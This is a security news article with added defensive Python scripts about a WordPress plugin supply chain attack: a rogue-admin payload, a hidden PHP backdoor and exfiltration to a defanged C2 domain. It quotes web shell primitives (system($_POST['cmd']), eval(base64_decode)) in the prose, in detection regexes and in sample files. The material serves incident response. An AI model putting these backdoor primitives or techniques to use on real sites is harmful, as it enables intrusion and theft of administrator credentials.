OptinMonster Supply Chain Attack Hits 1.2M WordPress Sites
A sophisticated supply chain attack targeting the widely used OptinMonster WordPress plugin has compromised more than 1.2 million WordPress websites, security researchers at Sansec confirmed this week.
The campaign, which also swept up users of the TrustPulse and PushEngage plugins, delivered malicious JavaScript through legitimate CDN-served files, meaning individual sites were infected without ever being directly targeted.
The operation mirrors the notorious 2024 Polyfill supply chain incident in both method and scale. Instead of attacking individual WordPress installations, threat actors tampered with upstream SDK files hosted on Awesome Motive-controlled BunnyNet CDN endpoints.
Any site loading scripts from domains including a.omappapi[.]com, a.opmnstr[.]com, a.trstplse[.]com, and clientcdn.pushengage[.]com automatically pulled the poisoned payload directly from the source.
Awesome Motive later confirmed the root cause: an attacker exploited a known vulnerability in the UpdraftPlus plugin on the company’s internal marketing server, discovered a CDN API key stored on that server, and used it to modify the SDK files delivered to customers globally.
The injected JavaScript is highly evasive. It exits immediately in headless browsers or WebDriver environments and only activates once it detects a logged-in WordPress administrator, identified through the wp-admin path, the presence of the admin bar, or a wordpress_logged_in_ cookie. A 24-hour throttle, stored in localStorage under _pe_ts, prevents the payload from re-running in the same browser within that window.
Once an active admin session is confirmed, the payload executes in stages:
- Harvests REST and AJAX nonces from the active session
- Creates a rogue administrator account under the fixed username developer_api1, alongside randomized dev_xxxxxx accounts
- Attempts account creation through four sequential fallback methods: user-new.php, admin-ajax.php, the wp/v2/users REST endpoint, and a hidden iframe form submission
- Recognizes "user already exists" error responses in approximately 20 languages to avoid detection
Following successful account creation, the payload silently uploads a self-hiding PHP backdoor plugin. Stolen credentials, the site origin, the admin path, and the WordPress version are then exfiltrated to the C2 domain tidio[.]cc, XOR-encrypted with the key jX9kM2nP4qR6sT8v.
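The exfiltration step above is a good place to show how an analyst would turn the reported key into a triage tool for captured traffic. The following is an added example, not code from the article or from Sansec. The article supplies only the key; the byte-level framing (repeating-key XOR over a UTF-8 JSON body, base64 for transport) and the JSON field names in the sample are assumptions, and the sample blob is constructed here.

```python
"""Decode and triage XOR-encrypted exfil blobs using the key reported for this campaign.

Added example. Framing assumptions: repeating-key XOR over UTF-8 JSON, then base64.
Adjust decode_exfil() if a real capture turns out to be framed differently.
"""
import base64
import itertools
import json

XOR_KEY = b"jX9kM2nP4qR6sT8v"  # key reported in the article


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR. It is its own inverse, so it both encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def decode_exfil(blob_b64: str, key: bytes = XOR_KEY) -> dict:
    """Base64-decode a captured POST body, strip the XOR layer, parse the JSON inside."""
    return json.loads(xor_bytes(base64.b64decode(blob_b64), key).decode("utf-8"))


def looks_like_exfil(raw: bytes, key: bytes = XOR_KEY) -> bool:
    """Triage heuristic for proxy or HAR captures of POSTs to tidio[.]cc/cdn-cgi/*:
    does the blob become a JSON object under the reported key? A wrong key or an
    unrelated blob yields garbage that json.loads rejects."""
    try:
        return isinstance(json.loads(xor_bytes(raw, key).decode("utf-8")), dict)
    except (UnicodeDecodeError, json.JSONDecodeError):
        return False


# Constructed sample of what a victim browser might send. The categories come from
# the article (credentials, origin, admin path, WP version); the exact keys are assumed.
SAMPLE_PAYLOAD = {
    "origin": "https://victim.example",
    "admin_path": "/wp-admin/",
    "wp_version": "6.5.2",
    "user": "developer_api1",
    "pass": "r4nd0mP@ss",
}
SAMPLE_BLOB = base64.b64encode(xor_bytes(json.dumps(SAMPLE_PAYLOAD).encode())).decode()

if __name__ == "__main__":
    print(decode_exfil(SAMPLE_BLOB))
```

Because XOR with an ASCII key never produces bytes above 0x7F from ASCII input, the UTF-8 decode in looks_like_exfil() will usually succeed even with the wrong key; it is the JSON parse that does the real filtering, so do not treat a clean decode alone as confirmation.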
The installed backdoor is engineered for complete stealth. It hides itself from the WordPress admin plugin list, REST API endpoints, update checks, and the recently active plugins list. It exposes two unauthenticated entry points: a web shell branded “WPM File Manager & Shell” that executes system($_POST['cmd']) and accepts arbitrary file uploads, and a secondary endpoint running eval(base64_decode(...)) on attacker-supplied input.
The plugin has been observed disguised as “Content Delivery Helper” (v2.7.1) and more recently as “Database Optimizer” (v2.9.4).
Researchers confirmed active exploitation, blocking 271 rogue account creation attempts across 13 sites on June 14–15. Of those, 263 targeted the wp/v2/users REST endpoint, with the remainder split across user-new.php and admin-ajax.php. Attempts originated from 81 unique IP addresses.
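The account-creation fallbacks listed above and the endpoint distribution Sansec observed suggest a straightforward hunt over the affected site's own access logs. The following is an added example, not code from the article or from Sansec. It assumes the nginx/Apache combined log format, and the log lines below are constructed for illustration.

```python
"""Hunt web server access logs for the rogue-account creation endpoints named in the article.

Added example. Assumes nginx/Apache "combined" log format. The hidden-iframe fallback
posts to user-new.php, so it is covered by that entry.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# ip - user [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(method: str, path: str):
    """Map a request to one of the three HTTP account-creation routes, or None."""
    if method != "POST":
        return None
    parts = urlsplit(path)
    p = parts.path.rstrip("/")
    rest_route = parse_qs(parts.query).get("rest_route", [""])[0].rstrip("/")
    if p.endswith("/wp-json/wp/v2/users") or rest_route == "/wp/v2/users":
        return "wp/v2/users"
    if p.endswith("/wp-admin/user-new.php"):
        return "user-new.php"
    if p.endswith("/wp-admin/admin-ajax.php"):
        # Noisy: legitimate plugins POST here constantly. Treat as "needs body review",
        # not as evidence on its own.
        return "admin-ajax.php"
    return None


def hunt(lines):
    """Return hit counts per route, the distinct source IPs per route, and
    (route, status) pairs, so 201s on wp/v2/users stand out from rejected attempts."""
    counts, ips, statuses = Counter(), defaultdict(set), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        route = classify(m["method"], m["path"])
        if route is None:
            continue
        counts[route] += 1
        ips[route].add(m["ip"])
        statuses[(route, m["status"])] += 1
    return {
        "counts": dict(counts),
        "ips": {k: sorted(v) for k, v in ips.items()},
        "statuses": dict(statuses),
    }


# Constructed sample lines (RFC 5737 documentation addresses, fictional host).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jun/2026:10:01:12 +0000] "POST /wp-json/wp/v2/users HTTP/1.1" 201 412 "https://example.test/wp-admin/" "Mozilla/5.0"
203.0.113.7 - - [14/Jun/2026:10:01:13 +0000] "POST /wp-json/wp/v2/users HTTP/1.1" 500 96 "https://example.test/wp-admin/" "Mozilla/5.0"
198.51.100.23 - - [14/Jun/2026:10:02:40 +0000] "POST /?rest_route=/wp/v2/users HTTP/1.1" 403 80 "-" "Mozilla/5.0"
198.51.100.23 - - [14/Jun/2026:10:02:41 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://example.test/wp-admin/user-new.php" "Mozilla/5.0"
198.51.100.23 - - [14/Jun/2026:10:02:42 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 31 "https://example.test/wp-admin/" "Mozilla/5.0"
192.0.2.9 - - [14/Jun/2026:10:03:00 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1870 "-" "Mozilla/5.0"
192.0.2.9 - - [14/Jun/2026:10:03:05 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for k, v in hunt(SAMPLE_LOG).items():
        print(k, v)
```

Because the payload runs inside a legitimate administrator's browser, these requests carry a valid admin cookie and nonce and will come from wherever that administrator sits, so the IP list is a pivot for correlating with the admin's normal activity rather than a blocklist. Note that the browser-to-tidio[.]cc exfil never appears in the site's access log; that traffic has to be hunted in the administrator's proxy or endpoint telemetry.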
Indicators of Compromise (IOCs)
| Category | Indicator | Details |
|---|---|---|
| C2 Domain | tidio[.]cc | IP: 84.201.6[.]54 · AS214036 · Cert registered 2026-04-28 |
| C2 Endpoint | tidio[.]cc/cdn-cgi/p | Exfil — OptinMonster/TrustPulse |
| C2 Endpoint | tidio[.]cc/cdn-cgi/b | Exfil — OptinMonster/TrustPulse |
| C2 Endpoint | tidio[.]cc/cdn-cgi/pe-p | Exfil — PushEngage variant |
| C2 Endpoint | tidio[.]cc/cdn-cgi/pe-l | Payload generation — PushEngage |
| XOR Key | jX9kM2nP4qR6sT8v | Malware encryption key |
| Rogue Account | developer_api1 | Fixed operator account |
| Rogue Account | dev_xxxxxx | Pattern-based randomized accounts |
| Backdoor Plugin | content-delivery-helper | “Content Delivery Helper” v2.7.1 |
| Backdoor Plugin | database-optimizer | “Database Optimizer” v2.9.4 |
Note: All domains and IPs above are intentionally defanged. Re-fang only within controlled TI platforms such as MISP, VirusTotal, or your SIEM.
Affected site owners should immediately audit user accounts and inspect the wp-content/plugins directory on disk, not solely through the admin UI, because the backdoor actively conceals itself from the dashboard.
If any IOCs are found, rotate all admin passwords and the WordPress secret keys and salts in wp-config.php immediately, and assume unauthenticated code execution has already occurred on the affected host.
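The audit advice above can be scripted against the filesystem rather than the dashboard. The following is an added example, not code from the article, Sansec, or WordPress. It uses the plugin slugs, usernames, and code primitives from the IOC table and the backdoor description; the character set assumed for the randomized dev_xxxxxx usernames (lowercase alphanumeric) is an assumption, since the article only gives the pattern, and the sample plugin tree and user list are constructed.

```python
"""Host-side audit for the backdoor plugin and rogue accounts described in the article.

Added example. Reads what is on disk, because the backdoor hides from the admin plugin
list, and compares it with what the dashboard shows. Username charset is assumed.
"""
import os
import re

BACKDOOR_SLUGS = {"content-delivery-helper", "database-optimizer"}  # from the IOC table
FIXED_ROGUE_USER = "developer_api1"
RANDOM_ROGUE_RE = re.compile(r"^dev_[a-z0-9]{6}$")  # dev_xxxxxx; charset is an assumption

# Primitives the article reports in the backdoor's two unauthenticated entry points.
SUSPICIOUS_CODE = [
    re.compile(r"system\s*\(\s*\$_POST\s*\["),
    re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    re.compile(r"WPM File Manager"),
]


def flag_users(usernames):
    """Return the usernames matching the rogue-account indicators, sorted."""
    return sorted(u for u in usernames if u == FIXED_ROGUE_USER or RANDOM_ROGUE_RE.match(u))


def audit_plugins(files, dashboard_plugins):
    """files: {path relative to wp-content/plugins: PHP source};
    dashboard_plugins: the slugs the admin UI lists.
    Returns (subject, reason) findings."""
    findings = []
    for slug in sorted({p.split("/", 1)[0] for p in files}):
        if slug in BACKDOOR_SLUGS:
            findings.append((slug, "known backdoor slug"))
        if slug not in dashboard_plugins:
            findings.append((slug, "present on disk but hidden from the dashboard"))
    for path, src in sorted(files.items()):
        for rx in SUSPICIOUS_CODE:
            if rx.search(src):
                findings.append((path, f"matches {rx.pattern}"))
    return findings


def load_plugins_dir(root):
    """Read every .php file under a real wp-content/plugins tree into the
    mapping audit_plugins() expects."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return files


# Constructed sample: one legitimate plugin, plus a tree matching the IOCs.
SAMPLE_FILES = {
    "akismet/akismet.php": "<?php /* Plugin Name: Akismet */",
    "database-optimizer/database-optimizer.php": "<?php /* Plugin Name: Database Optimizer\nVersion: 2.9.4 */",
    "database-optimizer/fm.php": "<?php system($_POST['cmd']);",
    "database-optimizer/x.php": "<?php eval(base64_decode($_POST['d']));",
}
SAMPLE_DASHBOARD = {"akismet"}  # what the hidden backdoor lets the admin UI show
SAMPLE_USERS = ["admin", "editor_jane", "developer_api1", "dev_k3x9qz", "developer"]

if __name__ == "__main__":
    print(flag_users(SAMPLE_USERS))
    for subject, reason in audit_plugins(SAMPLE_FILES, SAMPLE_DASHBOARD):
        print(f"{subject}: {reason}")
```

To run it on a live host, pass load_plugins_dir("/var/www/html/wp-content/plugins") as the first argument and the slug list copied from the Plugins screen as the second; any slug present on disk but absent from the dashboard deserves a look even if its name is not in the IOC table, since the article notes the disguise name has already changed once.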